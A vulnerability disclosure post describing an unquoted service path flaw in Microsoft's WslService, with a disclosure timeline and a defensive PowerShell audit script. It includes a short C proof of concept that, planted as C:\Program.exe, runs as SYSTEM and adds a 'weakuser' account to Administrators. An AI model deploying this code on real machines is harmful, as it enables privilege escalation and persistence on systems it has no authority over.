Microsoft WslService Unquoted Service Path

By Uriel Kosayev @MalFuzzer

Introduction

WslService is a service deployed on Windows machines that have WSL (Windows Subsystem for Linux) installed. An attacker can exploit this vulnerability during the post-exploitation phase to achieve code execution, privilege escalation, and persistence by planting an arbitrary unsigned executable that a signed service running with NT AUTHORITY\SYSTEM privileges then executes on the victim machine.

The Vulnerability

A service in the Windows operating system is susceptible to the “Unquoted Service Path” vulnerability if its executable path is not wrapped in quotation marks. In this case, the “WslService” Windows service is started through the “CreateProcessAsUserW” Windows API function, as shown below:

The “CreateProcessAsUserW” Windows API function receives several parameters, among them “lpApplicationName”, whose value is the module/file name or the full path to the module/file. In this case the path is passed without quotation marks, which is what leads to this vulnerability.

To exploit such a vulnerability, an attacker needs to drop a file that will be executed the next time the computer or the service restarts. This can be done either through an administrative account, or by abusing a service path whose directory has insufficiently restrictive permissions, so that even a low-privileged user with write (“W”) permission on that path can plant the file without an administrative account. Below you can see Microsoft’s explanation of the “lpApplicationName” parameter:

And below you can see that when “WslService” is executed, it runs under the elevated privilege context of NT AUTHORITY\SYSTEM:

PoC Reproduction Steps

    • Service enumeration on an endpoint where WSL is installed:

    • Compile the following persistence PoC code:

        #include <Windows.h>
        #include <stdlib.h>   /* system() */

        /* Creates a local user and adds it to the Administrators group.
           When launched by the service it runs as NT AUTHORITY\SYSTEM. */
        int main(void)
        {
            system("net user weakuser /add");
            system("net localgroup Administrators weakuser /add");
            return 0;
        }

    • Put the compiled PE executable in the root of the C:\ drive, named Program.exe.
    • Restart the computer and execute the following command to validate that a user named “weakuser” was created and added to the “Administrators” group.
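The enumeration step above can be turned into an audit that a defender runs on any Windows host. The following PowerShell is an added example, not code from the original post: it lists every service whose image path is unquoted and contains a space, and for each one reports the intermediate paths (such as C:\Program.exe) that the loader would try before the real binary, together with whether a file already exists there. The function names are my own; service data comes from the Win32_Service CIM class.

```powershell
# Added example (not from the original post): find services with unquoted
# image paths containing spaces and list the interception locations a
# defender should check for planted executables.
function Get-ServicePathHijackCandidate {
    param([Parameter(Mandatory)][string]$PathName)
    # Keep only the image path: everything up to and including the first ".exe".
    $m = [regex]::Match($PathName.Trim(), '^(.*?\.exe)', 'IgnoreCase')
    if (-not $m.Success) { return @() }
    $tokens = $m.Groups[1].Value -split ' '
    $candidates = @()
    # Each space is a possible end of the image name: "C:\Program Files\X\y.exe"
    # yields "C:\Program.exe" first, then the intended "C:\Program Files\X\y.exe".
    for ($i = 1; $i -le $tokens.Count; $i++) {
        $prefix = $tokens[0..($i - 1)] -join ' '
        if ($prefix -notmatch '\.exe$') { $prefix += '.exe' }
        $candidates += $prefix
    }
    return $candidates
}

function Find-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^\s*"' } |
        ForEach-Object {
            $svc   = $_
            $cands = Get-ServicePathHijackCandidate -PathName $svc.PathName
            # A path without spaces has exactly one candidate and is not affected.
            if ($cands.Count -gt 1) {
                # Every candidate except the last (the real binary) is a hijack location.
                foreach ($c in $cands[0..($cands.Count - 2)]) {
                    [pscustomobject]@{
                        Service    = $svc.Name
                        StartName  = $svc.StartName   # account the service runs as
                        PathName   = $svc.PathName
                        HijackPath = $c
                        # An existing file at a hijack location is a red flag.
                        Exists     = Test-Path -LiteralPath $c -PathType Leaf
                    }
                }
            }
        }
}

Find-UnquotedServicePath | Format-Table -AutoSize
```

Rows with StartName of LocalSystem and Exists set to True deserve immediate attention; the remaining rows show where directory permissions should be reviewed.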

Past Experiences with Such Vulns

Throughout my career I’ve seen many such vulnerabilities and exploited them in my clients’ red team engagements, including two CVEs: CVE-2020-8842 and CVE-2020-12307. For some reasons known to them, Microsoft decided to assign it neither a CVE nor a bounty, but I hope that at least they will fix it.

Disclosure Timeline

Jul 4th, 2023 — Vulnerability reported to MSRC.

Jul 5th, 2023 — Initial response from MSRC.

Jul 19th, 2023 — MSRC labeled it as “fixed”, but neither a bounty nor a CVE was issued.